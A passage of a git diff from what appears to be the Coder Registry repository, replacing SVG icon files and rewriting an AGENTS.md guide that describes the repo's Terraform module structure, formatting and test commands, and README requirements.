-						d="m 84.45,38.28 c -1.53,0.08 -3,0.79 -4.12,1.84 -1.13,1.05 -1.92,2.43 -2.41,3.88 -0.97,2.92 -0.75,6.08 -0.53,9.15 0.2,2.77 0.41,5.6 1.45,8.18 0.52,1.3 1.25,2.51 2.22,3.51 0.97,0.99 2.2,1.76 3.55,2.09 1.26,0.32 2.62,0.26 3.86,-0.13 1.25,-0.4 2.38,-1.11 3.32,-2.02 1.36,-1.33 2.27,-3.07 2.8,-4.9 0.53,-1.83 0.68,-3.75 0.65,-5.66 -0.04,-2.38 -0.35,-4.77 -1.09,-7.03 -0.75,-2.26 -1.94,-4.4 -3.6,-6.11 -0.8,-0.83 -1.72,-1.55 -2.75,-2.06 -1.04,-0.51 -2.2,-0.8 -3.35,-0.74 z"/>
-					<g id="pupil_left">
-						<path id="pupil_left_base" fill="#020204"
-							d="m 80.75,50.99 c -0.32,1.94 -0.33,3.97 0.33,5.81 0.44,1.22 1.17,2.33 2.05,3.28 0.57,0.62 1.23,1.18 1.99,1.55 0.77,0.37 1.65,0.52 2.48,0.32 0.76,-0.19 1.42,-0.68 1.91,-1.29 0.49,-0.61 0.82,-1.34 1.05,-2.09 0.69,-2.21 0.58,-4.62 -0.11,-6.83 -0.49,-1.61 -1.32,-3.16 -2.6,-4.24 -0.62,-0.52 -1.34,-0.93 -2.12,-1.11 -0.78,-0.19 -1.63,-0.14 -2.36,0.19 -0.81,0.37 -1.44,1.07 -1.85,1.86 -0.41,0.79 -0.62,1.67 -0.77,2.55 z"/>
-						<path id="pupil_left_glare" fill="url(#fill_pupil_left_glare)" filter="url(#blur_pupil_left_glare)" clip-path="url(#clip_pupil_left)"
-							d="m 84.84,49.59 c 0.21,0.55 0.91,0.75 1.3,1.19 0.37,0.42 0.76,0.87 0.97,1.4 0.39,1.01 -0.39,2.51 0.43,3.23 0.25,0.22 0.77,0.23 1.02,0 0.99,-0.9 0.77,-2.71 0.38,-3.99 -0.36,-1.15 -1.23,-2.25 -2.31,-2.8 -0.5,-0.26 -1.25,-0.47 -1.68,-0.11 -0.27,0.24 -0.24,0.74 -0.11,1.08 z"/>
-					</g>
-					<path id="eyelid_left" fill="url(#fill_eyelid_left)" clip-path="url(#clip_eye_left)"
-						d="m 81.14,44.46 c 2.32,-1.38 5.13,-1.7 7.82,-1.45 2.68,0.26 5.27,1.04 7.87,1.75 1.91,0.52 3.84,1 5.63,1.84 1.78,0.84 3.44,2.08 4.43,3.8 0.16,0.27 0.29,0.56 0.46,0.83 0.17,0.27 0.37,0.52 0.62,0.71 0.25,0.19 0.57,0.32 0.88,0.3 0.16,-0.01 0.32,-0.05 0.45,-0.13 0.14,-0.08 0.26,-0.2 0.33,-0.34 0.08,-0.16 0.11,-0.35 0.1,-0.53 -0.01,-0.18 -0.05,-0.36 -0.1,-0.54 -0.65,-2.37 -2.19,-4.38 -3.35,-6.55 -0.7,-1.3 -1.28,-2.66 -1.98,-3.96 -2.43,-4.45 -6.42,-7.94 -10.95,-10.21 -4.53,-2.27 -9.59,-3.36 -14.65,-3.65 -5.86,-0.35 -11.73,0.35 -17.51,1.37 -2.51,0.44 -5.06,0.96 -7.27,2.21 -1.11,0.62 -2.13,1.42 -2.92,2.42 -0.8,0.99 -1.36,2.18 -1.55,3.44 -0.17,1.22 0.01,2.47 0.44,3.62 0.42,1.15 1.08,2.2 1.86,3.15 1.54,1.91 3.53,3.39 5.36,5.03 1.83,1.63 3.52,3.44 5.57,4.79 1.02,0.68 2.13,1.24 3.31,1.57 1.18,0.33 2.44,0.42 3.64,0.17 1.24,-0.25 2.4,-0.86 3.41,-1.64 1.01,-0.77 1.88,-1.7 2.71,-2.66 1.66,-1.93 3.21,-4.04 5.39,-5.34 z"/>
-					<path id="eyebrow_left" fill="url(#fill_eyebrow_left)" filter="url(#blur_eyebrow_left)"
-						d="m 90.77,36.57 c 2.16,2.02 3.76,4.52 4.85,7.16 -0.48,-2.91 -1.23,-5.26 -3.13,-7.16 -1.16,-1.09 -2.49,-2.05 -3.98,-2.72 -1.32,-0.59 -2.77,-0.96 -3.61,-0.97 -0.83,-0.02 -1.03,0 -1.2,0.01 -0.18,0.01 -0.31,0.01 0.23,0.08 0.54,0.06 1.75,0.39 3.05,0.97 1.3,0.58 2.62,1.54 3.79,2.63 z"/>
-				</g>
-				<g id="eye_right">
-					<path id="eyeball_right" fill="url(#fill_eyeball_right)"
-						d="m 111.61,38.28 c -2.39,1.65 -4.4,3.94 -5.38,6.68 -1.24,3.45 -0.77,7.31 0.43,10.77 1.22,3.55 3.27,6.93 6.36,9.06 1.54,1.07 3.33,1.8 5.19,2.02 1.87,0.22 3.8,-0.09 5.47,-0.95 2.02,-1.06 3.57,-2.91 4.53,-4.98 0.96,-2.08 1.37,-4.37 1.5,-6.66 0.16,-2.9 -0.12,-5.86 -1.08,-8.61 -1.04,-2.99 -2.92,-5.75 -5.58,-7.47 -1.32,-0.86 -2.83,-1.45 -4.4,-1.67 -1.57,-0.22 -3.19,-0.05 -4.67,0.52 -0.84,0.33 -1.62,0.78 -2.37,1.29 z"/>
-					<g id="pupil_right">
-						<path id="pupil_right_base" fill="#020204"
-							d="m 117.14,45.52 c -0.9,0.06 -1.78,0.37 -2.55,0.85 -0.76,0.48 -1.41,1.13 -1.92,1.88 -1.03,1.49 -1.48,3.31 -1.55,5.12 -0.05,1.35 0.1,2.72 0.55,4 0.45,1.28 1.2,2.47 2.25,3.33 1.07,0.89 2.42,1.42 3.81,1.49 1.39,0.06 2.79,-0.34 3.93,-1.13 0.91,-0.63 1.64,-1.5 2.16,-2.48 0.52,-0.97 0.84,-2.05 0.98,-3.15 0.25,-1.93 -0.03,-3.95 -0.93,-5.69 -0.89,-1.74 -2.41,-3.17 -4.24,-3.84 -0.8,-0.29 -1.65,-0.44 -2.49,-0.38 z"/>
-						<path id="pupil_right_glare" fill="url(#fill_pupil_right_glare)" filter="url(#blur_pupil_right_glare)" clip-path="url(#clip_pupil_right)"
-							d="m 122.71,53.36 c 1,-1 -0.71,-3.65 -2.05,-4.74 -0.97,-0.78 -3.78,-1.61 -3.66,-0.75 0.12,0.85 1.39,1.95 2.23,2.79 1.05,1.03 3,3.18 3.48,2.7 z"/>
-					</g>
-					<path id="eyelid_right" fill="url(#fill_eyelid_right)" clip-path="url(#clip_eye_right)"
-						d="m 102.56,47.01 c 2.06,-1.71 4.45,-3.01 7,-3.8 5.25,-1.62 11.2,-0.98 15.84,1.97 1.6,1.01 3.03,2.27 4.52,3.45 1.48,1.17 3.06,2.27 4.85,2.9 0.97,0.34 2,0.54 3.02,0.43 0.92,-0.09 1.81,-0.44 2.57,-0.96 0.76,-0.53 1.4,-1.23 1.88,-2.02 0.96,-1.58 1.27,-3.5 1.1,-5.34 -0.33,-3.69 -2.41,-6.94 -4.15,-10.21 -0.55,-1.02 -1.07,-2.06 -1.73,-3.01 -2.01,-2.93 -5.23,-4.86 -8.6,-5.99 -3.37,-1.13 -6.93,-1.54 -10.46,-1.98 -1.58,-0.2 -3.17,-0.41 -4.74,-0.22 -1.81,0.22 -3.51,0.95 -5.28,1.4 -0.84,0.22 -1.69,0.37 -2.52,0.61 -0.83,0.24 -1.65,0.57 -2.33,1.11 -0.98,0.79 -1.6,1.98 -1.87,3.21 -0.27,1.24 -0.21,2.52 -0.01,3.77 0.39,2.5 1.33,4.93 1.24,7.46 -0.06,1.73 -0.61,3.44 -0.54,5.17 0.02,0.51 0.12,1.55 0.21,2.05 z"/>
-					<path id="eyebrow_right" fill="url(#fill_eyebrow_right)" filter="url(#blur_eyebrow_right)"
-						d="m 119.93,31.18 c -0.41,0.52 -0.78,1.08 -1.07,1.7 1.85,0.4 3.61,1.16 5.19,2.21 3.06,2.03 5.38,4.99 7.01,8.29 0.38,-0.42 0.72,-0.87 1.02,-1.37 -1.64,-3.44 -4,-6.55 -7.16,-8.65 -1.52,-1 -3.21,-1.77 -4.99,-2.18 z"/>
-				</g>
-			</g>
-			<g id="beak">
-				<g id="beak_shadow">
-					<path id="beak_shadow_lower" fill="#000000" fill-opacity="0.258824" filter="url(#blur_beak_shadow_lower)" clip-path="url(#clip_body)"
-						d="m 81.12,89.33 c 1.47,4.26 4.42,7.89 7.92,10.72 1.16,0.95 2.39,1.82 3.76,2.43 1.36,0.62 2.87,0.97 4.36,0.84 1.46,-0.12 2.85,-0.7 4.13,-1.42 1.28,-0.72 2.46,-1.59 3.7,-2.37 2.12,-1.35 4.39,-2.44 6.6,-3.64 2.65,-1.45 5.23,-3.1 7.46,-5.14 1.03,-0.93 1.98,-1.95 3.11,-2.75 1.13,-0.81 2.49,-1.39 3.87,-1.29 1.04,0.07 2.01,0.51 3.03,0.73 0.51,0.11 1.03,0.16 1.55,0.08 0.51,-0.08 1.01,-0.29 1.37,-0.67 0.44,-0.46 0.64,-1.12 0.61,-1.76 -0.02,-0.63 -0.24,-1.25 -0.54,-1.81 -0.59,-1.13 -1.49,-2.1 -1.89,-3.31 -0.36,-1.08 -0.29,-2.24 -0.26,-3.37 0.03,-1.14 0.01,-2.32 -0.51,-3.33 -0.4,-0.76 -1.07,-1.37 -1.83,-1.77 -0.76,-0.41 -1.62,-0.62 -2.48,-0.7 -1.72,-0.16 -3.44,0.18 -5.17,0.27 -2.28,0.13 -4.58,-0.15 -6.87,-0.02 -2.85,0.18 -5.65,1 -8.51,1.01 -3.26,0.01 -6.52,-1.06 -9.74,-0.55 -1.39,0.22 -2.71,0.72 -4.03,1.16 -1.33,0.45 -2.7,0.84 -4.1,0.82 -1.59,-0.03 -3.13,-0.58 -4.72,-0.69 -0.79,-0.06 -1.6,0 -2.35,0.28 -0.74,0.28 -1.41,0.79 -1.78,1.5 -0.21,0.4 -0.31,0.86 -0.33,1.31 -0.02,0.46 0.04,0.91 0.15,1.36 0.22,0.88 0.63,1.71 0.96,2.55 1.2,3.07 1.46,6.42 2.53,9.53 z"/>
-					<path id="beak_shadow_upper" opacity="0.3" fill="#000000" filter="url(#blur_beak_shadow_upper)" clip-path="url(#clip_body)"
-						d="m 77.03,77.2 c 2.85,1.76 5.41,3.93 7.56,6.39 1.99,2.29 3.68,4.89 6.29,6.58 1.83,1.2 4.04,1.87 6.28,2.08 2.63,0.24 5.29,-0.15 7.83,-0.84 2.35,-0.63 4.62,-1.53 6.7,-2.71 3.97,-2.25 7.28,-5.55 11.65,-7.03 0.95,-0.33 1.94,-0.56 2.86,-0.96 0.92,-0.39 1.79,-0.99 2.23,-1.83 0.42,-0.82 0.4,-1.75 0.54,-2.64 0.15,-0.96 0.48,-1.88 0.66,-2.83 0.18,-0.95 0.2,-1.96 -0.24,-2.83 -0.37,-0.72 -1.04,-1.29 -1.81,-1.66 -0.77,-0.36 -1.64,-0.52 -2.51,-0.56 -1.72,-0.08 -3.43,0.33 -5.16,0.47 -2.28,0.19 -4.58,-0.08 -6.87,-0.01 -2.85,0.08 -5.66,0.67 -8.51,0.8 -3.25,0.14 -6.49,-0.34 -9.74,-0.44 -1.41,-0.05 -2.83,-0.03 -4.21,0.2 -1.39,0.22 -2.75,0.65 -3.92,1.37 -1.14,0.69 -2.07,1.64 -3.11,2.45 -0.52,0.41 -1.08,0.78 -1.68,1.07 -0.61,0.28 -1.28,0.48 -1.96,0.51 -0.35,0.01 -0.71,-0.01 -1.05,0.04 -0.59,0.08 -1.13,0.39 -1.47,0.83 -0.34,0.45 -0.47,1.02 -0.36,1.55 z"/>
-				</g>
-				<path id="beak_base" fill="url(#fill_beak_base)"
-					d="m 91.66,58.53 c 1.53,-1.71 2.57,-3.8 4.03,-5.56 0.73,-0.88 1.58,-1.69 2.57,-2.26 0.99,-0.57 2.15,-0.89 3.29,-0.79 1.27,0.11 2.46,0.74 3.39,1.61 0.93,0.87 1.62,1.97 2.17,3.12 0.53,1.11 0.95,2.28 1.71,3.24 0.81,1.02 1.94,1.71 2.97,2.52 0.51,0.4 1.01,0.83 1.41,1.34 0.41,0.51 0.72,1.1 0.86,1.74 0.13,0.65 0.06,1.33 -0.16,1.95 -0.23,0.62 -0.61,1.18 -1.09,1.64 -0.95,0.92 -2.25,1.42 -3.56,1.6 -2.62,0.37 -5.27,-0.41 -7.92,-0.34 -2.67,0.08 -5.29,1.02 -7.97,0.93 -1.33,-0.05 -2.69,-0.38 -3.79,-1.14 -0.55,-0.39 -1.03,-0.88 -1.38,-1.45 -0.34,-0.57 -0.55,-1.23 -0.58,-1.9 -0.02,-0.64 0.13,-1.28 0.39,-1.86 0.25,-0.59 0.61,-1.12 1.01,-1.62 0.81,-0.99 1.8,-1.81 2.65,-2.77 z"/>
-				<g id="mandible_lower">
-					<path id="mandible_lower_base" fill="url(#fill_mandible_lower_base)"
-						d="m 77.14,75.05 c 0.06,0.26 0.15,0.5 0.28,0.73 0.23,0.38 0.57,0.69 0.93,0.95 0.36,0.27 0.75,0.49 1.13,0.72 2.01,1.27 3.65,3.04 5.11,4.92 1.95,2.52 3.68,5.31 6.29,7.14 1.84,1.3 4.04,2.03 6.28,2.26 2.63,0.26 5.29,-0.16 7.83,-0.91 2.35,-0.69 4.62,-1.66 6.7,-2.95 3.97,-2.44 7.28,-6.02 11.65,-7.63 0.95,-0.35 1.94,-0.6 2.86,-1.03 0.92,-0.44 1.79,-1.08 2.23,-2 0.42,-0.88 0.4,-1.9 0.54,-2.87 0.15,-1.03 0.48,-2.03 0.66,-3.06 0.18,-1.03 0.2,-2.13 -0.24,-3.08 -0.37,-0.78 -1.04,-1.4 -1.81,-1.79 -0.77,-0.4 -1.64,-0.58 -2.51,-0.62 -1.72,-0.08 -3.43,0.36 -5.16,0.52 -2.28,0.21 -4.58,-0.09 -6.87,-0.02 -2.85,0.09 -5.66,0.73 -8.51,0.87 -3.25,0.15 -6.49,-0.35 -9.74,-0.48 -1.41,-0.06 -2.83,-0.04 -4.22,0.2 -1.39,0.23 -2.75,0.71 -3.91,1.51 -1.13,0.78 -2.03,1.84 -3.07,2.74 -0.52,0.45 -1.08,0.86 -1.7,1.16 -0.61,0.3 -1.29,0.49 -1.98,0.47 -0.35,-0.01 -0.72,-0.06 -1.05,0.04 -0.21,0.07 -0.4,0.2 -0.56,0.35 -0.16,0.16 -0.29,0.34 -0.41,0.52 -0.29,0.42 -0.54,0.87 -0.75,1.34 z"/>
-					<path id="mandible_lower_glare" fill="#d9b30d" filter="url(#blur_mandible_lower_glare)" clip-path="url(#clip_mandible_lower)"
-						d="m 89.9,78.56 c -0.33,1.37 -0.13,2.87 0.56,4.11 0.68,1.24 1.84,2.2 3.19,2.65 1.7,0.57 3.62,0.29 5.21,-0.54 0.93,-0.48 1.77,-1.16 2.3,-2.06 0.27,-0.44 0.46,-0.94 0.53,-1.46 0.06,-0.51 0.02,-1.05 -0.16,-1.54 -0.2,-0.53 -0.56,-1 -0.99,-1.37 -0.44,-0.37 -0.95,-0.64 -1.5,-0.82 -1.08,-0.36 -2.77,-0.66 -3.91,-0.68 -2.02,-0.04 -4.9,0.34 -5.23,1.71 z"/>
-				</g>
-				<g id="mandible_upper">
-					<path id="mandible_upper_shadow" fill="#604405" filter="url(#blur_mandible_upper_shadow)" clip-path="url(#clip_mandible_lower)"
-						d="m 84.31,67.86 c -1.16,0.68 -2.27,1.43 -3.36,2.2 -0.57,0.41 -1.15,0.84 -1.45,1.47 -0.21,0.44 -0.26,0.94 -0.27,1.43 0,0.5 0.03,0.99 -0.04,1.48 -0.04,0.33 -0.13,0.66 -0.14,0.99 -0.01,0.17 0,0.34 0.04,0.5 0.05,0.16 0.13,0.32 0.24,0.44 0.15,0.16 0.35,0.26 0.56,0.32 0.21,0.06 0.42,0.09 0.64,0.14 1.01,0.24 1.89,0.86 2.66,1.56 0.77,0.69 1.47,1.48 2.28,2.13 2.18,1.78 5.07,2.52 7.89,2.56 2.82,0.05 5.61,-0.54 8.36,-1.16 2.16,-0.49 4.32,-0.99 6.39,-1.76 3.2,-1.18 6.16,-2.96 8.72,-5.19 1.17,-1.01 2.26,-2.12 3.57,-2.94 1.15,-0.73 2.44,-1.21 3.62,-1.9 0.11,-0.06 0.21,-0.13 0.3,-0.2 0.1,-0.08 0.18,-0.18 0.24,-0.28 0.09,-0.19 0.09,-0.42 0.03,-0.62 -0.06,-0.2 -0.18,-0.38 -0.31,-0.55 -0.15,-0.18 -0.31,-0.34 -0.49,-0.5 -1.23,-1.05 -2.89,-1.43 -4.51,-1.56 -1.61,-0.12 -3.24,-0.03 -4.83,-0.3 -1.5,-0.25 -2.92,-0.81 -4.37,-1.27 -1.52,-0.49 -3.07,-0.87 -4.64,-1.13 -3.71,-0.61 -7.52,-0.49 -11.19,0.27 -3.49,0.73 -6.87,2.05 -9.94,3.87 z"/>
-					<path id="mandible_upper_base" fill="url(#fill_mandible_upper_base)"
-						d="m 83.94,63.95 c -1.66,1.12 -3.16,2.49 -4.43,4.04 -0.72,0.89 -1.38,1.86 -1.74,2.94 -0.29,0.86 -0.39,1.76 -0.57,2.65 -0.07,0.33 -0.15,0.66 -0.14,1 0,0.16 0.02,0.33 0.07,0.5 0.05,0.16 0.14,0.31 0.25,0.43 0.2,0.2 0.47,0.31 0.74,0.37 0.28,0.05 0.56,0.06 0.84,0.09 1.25,0.15 2.4,0.75 3.44,1.47 1.04,0.71 2,1.55 3.07,2.22 2.35,1.49 5.16,2.15 7.95,2.26 2.78,0.11 5.56,-0.31 8.3,-0.86 2.17,-0.43 4.33,-0.95 6.39,-1.76 3.16,-1.25 6.01,-3.16 8.72,-5.19 1.24,-0.92 2.46,-1.87 3.57,-2.94 0.37,-0.37 0.74,-0.74 1.14,-1.08 0.4,-0.33 0.85,-0.62 1.35,-0.78 0.76,-0.24 1.58,-0.17 2.37,-0.04 0.59,0.1 1.18,0.23 1.78,0.21 0.3,-0.02 0.6,-0.07 0.88,-0.18 0.28,-0.11 0.54,-0.28 0.73,-0.52 0.25,-0.3 0.38,-0.7 0.38,-1.09 0,-0.4 -0.12,-0.79 -0.32,-1.13 -0.4,-0.68 -1.09,-1.14 -1.81,-1.46 -0.99,-0.44 -2.06,-0.65 -3.11,-0.91 -3.23,-0.78 -6.37,-1.93 -9.34,-3.41 -1.48,-0.73 -2.92,-1.54 -4.37,-2.32 -1.5,-0.8 -3.02,-1.57 -4.64,-2.07 -3.64,-1.1 -7.6,-0.74 -11.19,0.51 -3.98,1.38 -7.58,3.84 -10.31,7.05 z"/>
-					<path id="mandible_upper_glare" fill="#f6da4a" filter="url(#blur_mandible_upper_glare)" clip-path="url(#clip_mandible_upper)"
-						d="m 109.45,64.75 c -0.2,-0.24 -0.48,-0.42 -0.78,-0.51 -0.3,-0.09 -0.62,-0.09 -0.93,-0.04 -0.62,0.11 -1.18,0.44 -1.7,0.8 -1.47,1.01 -2.77,2.26 -3.91,3.64 -1.5,1.83 -2.74,3.94 -3.16,6.27 -0.07,0.39 -0.11,0.8 -0.07,1.19 0.05,0.4 0.2,0.79 0.49,1.07 0.24,0.25 0.58,0.4 0.92,0.45 0.35,0.05 0.71,0 1.04,-0.11 0.66,-0.22 1.21,-0.69 1.74,-1.15 2.87,-2.58 5.47,-5.66 6.51,-9.38 0.1,-0.37 0.19,-0.75 0.19,-1.14 0,-0.39 -0.1,-0.78 -0.34,-1.09 z"/>
-					<path id="naris_left" opacity="0.8" fill="url(#fill_naris_left)" filter="url(#blur_naris_left)"
-						d="m 92.72,59.06 c -0.77,-0.25 -2.03,1.1 -1.62,1.79 0.11,0.19 0.46,0.43 0.7,0.3 0.35,-0.19 0.64,-0.89 1.02,-1.16 0.25,-0.18 0.2,-0.84 -0.1,-0.93 z"/>
-					<path id="naris_right" opacity="0.8" fill="url(#fill_naris_right)" filter="url(#blur_naris_right)"
-						d="m 102.56,59.42 c 0.2,0.64 1.23,0.53 1.83,0.84 0.52,0.27 0.94,0.86 1.53,0.88 0.56,0.01 1.44,-0.2 1.51,-0.76 0.09,-0.73 -0.98,-1.2 -1.67,-1.47 -0.89,-0.34 -2.03,-0.52 -2.86,-0.06 -0.19,0.11 -0.4,0.36 -0.34,0.57 z"/>
-				</g>
-				<path id="beak_corner" fill="url(#fill_beak_corner)" filter="url(#blur_beak_corner)" clip-path="url(#clip_beak)"
-					d="m 129.27,69.15 a 2.42,3.1 16.94 0 1 -2.81,3.04 2.42,3.1 16.94 0 1 -2.12,-3.04 2.42,3.1 16.94 0 1 2.81,-3.05 2.42,3.1 16.94 0 1 2.12,3.05 z"/>
-			</g>
-		</g>
-	</g>
-</svg>
@@ -1,11 +1 @@
-<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg">
-<g clip-path="url(#clip0_147_2)">
-<path d="M162.358 73H257V182H162.358V73Z" fill="white"/>
-<path d="M0 182V78.4618H26.039L27.0034 103.381L24.3033 102.221C25.7177 96.6843 27.8391 91.9835 30.6684 88.1202C33.6255 84.2569 37.1618 81.2949 41.2769 79.2343C45.3914 77.1742 49.8921 76.1439 54.7785 76.1439C63.3938 76.1439 70.3377 78.6552 75.6097 83.6773C81.0105 88.6998 84.4824 95.4606 86.0251 103.96L82.3606 104.153C83.518 98.1008 85.5112 93.0138 88.3401 88.8931C91.2976 84.6431 94.8978 81.4883 99.1411 79.4277C103.385 77.2387 108.143 76.1439 113.415 76.1439C120.615 76.1439 126.788 77.6249 131.931 80.5869C137.075 83.5488 141.061 87.9913 143.89 93.9152C146.719 99.7102 148.133 106.858 148.133 115.357V182H119.201V123.47C119.201 115.357 117.98 109.305 115.536 105.312C113.093 101.191 109.107 99.1311 103.577 99.1311C100.106 99.1311 97.1484 100.097 94.7052 102.029C92.262 103.96 90.3332 106.793 88.9188 110.528C87.6326 114.134 86.9895 118.577 86.9895 123.857V182H60.9506V123.857C60.9506 115.872 59.7936 109.755 57.4787 105.505C55.1642 101.256 51.1779 99.1311 45.5202 99.1311C42.0482 99.1311 39.0263 100.097 36.4548 102.029C34.0117 103.96 32.1472 106.793 30.861 110.528C29.5753 114.262 28.9322 118.705 28.9322 123.857V182H0Z" fill="white"/>
-</g>
-<defs>
-<clipPath id="clip0_147_2">
-<rect width="256" height="256" fill="white"/>
-</clipPath>
-</defs>
-</svg>
+<svg xmlns="http://www.w3.org/2000/svg" width="135" height="62" fill="none" viewBox="0 0 135 62"><path fill="#fff" d="M3.168 48V22.272H9.648L9.888 28.464L9.216 28.176C9.568 26.8 10.096 25.632 10.8 24.672C11.536 23.712 12.416 22.976 13.44 22.464C14.464 21.952 15.584 21.696 16.8 21.696C18.944 21.696 20.672 22.32 21.984 23.568C23.328 24.816 24.192 26.496 24.576 28.608L23.664 28.656C23.952 27.152 24.448 25.888 25.152 24.864C25.888 23.808 26.784 23.024 27.84 22.512C28.896 21.968 30.08 21.696 31.392 21.696C33.184 21.696 34.72 22.064 36 22.8C37.28 23.536 38.272 24.64 38.976 26.112C39.68 27.552 40.032 29.328 40.032 31.44V48H32.832V33.456C32.832 31.44 32.528 29.936 31.92 28.944C31.312 27.92 30.32 27.408 28.944 27.408C28.08 27.408 27.344 27.648 26.736 28.128C26.128 28.608 25.648 29.312 25.296 30.24C24.976 31.136 24.816 32.24 24.816 33.552V48H18.336V33.552C18.336 31.568 18.048 30.048 17.472 28.992C16.896 27.936 15.904 27.408 14.496 27.408C13.632 27.408 12.88 27.648 12.24 28.128C11.632 28.608 11.168 29.312 10.848 30.24C10.528 31.168 10.368 32.272 10.368 33.552V48H3.168ZM54.2254 48.576C51.5694 48.576 49.4894 47.728 47.9854 46.032C46.5134 44.304 45.7774 41.904 45.7774 38.832V22.272H52.9774V37.152C52.9774 39.136 53.2814 40.592 53.8894 41.52C54.4974 42.416 55.4574 42.864 56.7694 42.864C58.2414 42.864 59.3774 42.368 60.1774 41.376C61.0094 40.352 61.4254 38.832 61.4254 36.816V22.272H68.6254V48H62.0494L61.8574 40.608L62.7694 40.8C62.3854 43.36 61.4734 45.296 60.0334 46.608C58.5934 47.92 56.6574 48.576 54.2254 48.576ZM72.8486 48L82.0166 34.944L73.0886 22.272H80.7206L86.2406 30.528L91.5686 22.272H99.3926L90.5126 34.992L99.6326 48H92.0006L86.3366 39.264L80.6246 48H72.8486Z"/><rect width="26" height="35" x="109" y="13" fill="#fff"/></svg>
@@ -1,3 +0,0 @@
-<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M37.3333 213.333C33.0666 213.333 29.3333 211.733 26.1333 208.533C22.9333 205.333 21.3333 201.6 21.3333 197.333V58.6667C21.3333 54.4001 22.9333 50.6667 26.1333 47.4667C29.3333 44.2667 33.0666 42.6667 37.3333 42.6667H218.667C222.933 42.6667 226.667 44.2667 229.867 47.4667C233.067 50.6667 234.667 54.4001 234.667 58.6667V197.333C234.667 201.6 233.067 205.333 229.867 208.533C226.667 211.733 222.933 213.333 218.667 213.333H37.3333ZM37.3333 197.333H218.667V81.0668H37.3333V197.333ZM80 178.133L68.8 166.933L96.2666 139.2L68.5333 111.467L80 100.267L118.933 139.2L80 178.133ZM130.667 179.2V163.2H189.333V179.2H130.667Z" fill="white"/>
-</svg>
@@ -1,43 +1,168 @@
 # AGENTS.md

-Coder Registry: Terraform modules/templates for Coder workspaces under `registry/[namespace]/modules/` and `registry/[namespace]/templates/`.
+This file provides guidance to AI coding assistants when working with code in this repository.

-## Commands
+## Project Overview
+
+The Coder Registry is a community-driven repository for Terraform modules and templates that extend Coder workspaces. It's organized with:
+
+- **Modules**: Individual components and tools (IDEs, auth integrations, dev tools)
+- **Templates**: Complete workspace configurations for different platforms
+- **Namespaces**: Each contributor has their own namespace under `/registry/[namespace]/`
+
+## Common Development Commands
+
+### Formatting

 ```bash
-bun run fmt                                           # Format code (Prettier + Terraform) - run before commits
-bun run tftest                                        # Run all Terraform tests
-bun run tstest                                        # Run all TypeScript tests
-terraform init -upgrade && terraform test -verbose    # Test single module (run from module dir)
-bun test main.test.ts                                 # Run single TS test (from module dir)
-./scripts/terraform_validate.sh                       # Validate Terraform syntax
-./scripts/new_module.sh ns/name                       # Create new module scaffold
-.github/scripts/version-bump.sh patch | minor | major # Bump module version after changes
+bun run fmt    # Format all code (Prettier + Terraform)
+bun run fmt:ci # Check formatting (CI mode)
 ```

-## Structure
+### Testing

- **Modules**: `registry/[ns]/modules/[name]/` with `main.tf`, `README.md` (YAML frontmatter), `.tftest.hcl` (required)
- **Templates**: `registry/[ns]/templates/[name]/` with `main.tf`, `README.md`
- **Validation**: `cmd/readmevalidation/` (Go) validates structure/frontmatter; URLs must be relative, not absolute
+```bash
+# Test all modules with .tftest.hcl files
+bun run test

-## Code Style
+# Test specific module (from module directory)
+terraform init -upgrade
+terraform test -verbose

- Every module MUST have `.tftest.hcl` tests; optional `main.test.ts` for container/script tests
- README frontmatter: `display_name`, `description`, `icon`, `verified: false`, `tags`
- Use semantic versioning; bump version via script when modifying modules
- Docker tests require Linux or Colima/OrbStack (not Docker Desktop)
- Use `tf` (not `hcl`) for code blocks in README; use relative icon paths (e.g., `../../../../.icons/`)
- **Do NOT include input/output variable tables in module or template READMEs.** The registry automatically generates these from the Terraform source (e.g., variable and output blocks in `main.tf`). Adding them to the README is redundant and creates maintenance drift.
- Usage examples (e.g., a `module "..." { }` block) are encouraged, but not tables enumerating inputs/outputs.
+# Validate Terraform syntax
+./scripts/terraform_validate.sh
+```

-## PR Review Checklist
+### Module Creation

- Version bumped via `.github/scripts/version-bump.sh` if module changed (patch=bugfix, minor=feature, major=breaking)
- Breaking changes documented: removed inputs, changed defaults, new required variables
- New variables have sensible defaults to maintain backward compatibility
- Tests pass (`bun run tftest`, `bun run tstest`); add diagnostic logging for test failures
- README examples updated with new version number; tooltip/behavior changes noted
- Shell scripts handle errors gracefully (use `|| echo "Warning..."` for non-fatal failures)
- No hardcoded values that should be configurable; no absolute URLs (use relative paths)
- If AI-assisted: include model and tool/agent name at footer of PR body (e.g., "Generated with [Amp](thread-url) using Claude")
+```bash
+# Generate new module scaffold
+./scripts/new_module.sh namespace/module-name
+```
+
+### TypeScript Testing & Setup
+
+The repository uses Bun for TypeScript testing with utilities:
+
+- `test/test.ts` - Testing utilities for container management and Terraform operations
+- `setup.ts` - Test cleanup (removes .tfstate files and test containers)
+- Container-based testing with Docker for module validation
+
+## Architecture & Organization
+
+### Directory Structure
+
+```
+registry/[namespace]/
+├── README.md          # Contributor info with frontmatter
+├── .images/           # Namespace avatar (avatar.png/svg)
+├── modules/           # Individual components
+│   └── [module]/      # Each module has main.tf, README.md, tests
+└── templates/         # Complete workspace configs
+    └── [template]/    # Each template has main.tf, README.md
+```
+
+### Key Components
+
+**Module Structure**: Each module contains:
+
+- `main.tf` - Terraform implementation
+- `README.md` - Documentation with YAML frontmatter
+- `.tftest.hcl` - Terraform test files (required)
+- `run.sh` - Optional startup script
+
+**Template Structure**: Each template contains:
+
+- `main.tf` - Complete Coder template configuration
+- `README.md` - Documentation with YAML frontmatter
+- Additional configs, scripts as needed
+
+### README Frontmatter Requirements
+
+All modules/templates require YAML frontmatter:
+
+```yaml
+---
+display_name: "Module Name"
+description: "Brief description"
+icon: "../../../../.icons/tool.svg"
+verified: false
+tags: ["tag1", "tag2"]
+---
+```
+
+## Testing Requirements
+
+### Module Testing
+
+- Every module MUST have `.tftest.hcl` test files
+- Optional `main.test.ts` files for container-based testing or complex business logic validation
+- Tests use Docker containers with `--network=host` flag
+- Linux required for testing (Docker Desktop on macOS/Windows won't work)
+- Use Colima or OrbStack on macOS instead of Docker Desktop
+
+### Test Utilities
+
+The `test/test.ts` file provides:
+
+- `runTerraformApply()` - Execute Terraform with variables
+- `executeScriptInContainer()` - Run coder_script resources in containers
+- `testRequiredVariables()` - Validate required variables
+- Container management functions
+
+## Validation & Quality
+
+### Automated Validation
+
